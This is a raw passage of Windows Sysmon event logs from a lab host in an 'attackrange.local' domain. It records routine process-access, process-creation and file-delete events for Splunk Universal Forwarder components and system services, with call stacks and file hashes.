Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.281{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.922{466BC892-F6B3-60EB-A47D-00000000CF01}100965696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=846E5D90F569D4FB6D810CC5EA7E36E5,SHA256=CE6804D37F10EFF11A5B2C44DE00E3B2CA172CF4AA7B1048AC4A5697C27507EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:51.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F55D52A8119589E2877CFCE56FF11228,SHA256=78C845FC3BBC7A47C4416E50192FD9885590297D208DFAF93F23FAE3116293B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.568{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.553{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.321{466BC892-F6B2-60EB-A37D-00000000CF01}17245004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.301{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB978A43D81B42E4F7DEBE5EC43F715,SHA256=BBBB2592A601F2C8B4E06274AAE5AECEF3C4E074EAB2B8343BE4E00C86F1293E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.297{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDD00ECA18B7C0D84984D79A8D33DF69,SHA256=7025232E94F8A4E5B9CD8AA0A15B5496777938ED243758A61B21161BEAB47DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:52.699{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553406FE6E4D2EDC5169A28CD3BD77D2,SHA256=020FC40C78DC1AAFDB1A1F0BB153FCFEBEBAD4BF11AF17633B1176917EF5B597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=095B89E2CA38AC7EE03E832BB46756DD,SHA256=B7D6658DAA11CA25D05827CF761C5EC3E567FEB5DCFDC3C27757260ACE938C5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.571{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB978A43D81B42E4F7DEBE5EC43F715,SHA256=BBBB2592A601F2C8B4E06274AAE5AECEF3C4E074EAB2B8343BE4E00C86F1293E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.436{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:52.434{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.434{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:52.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 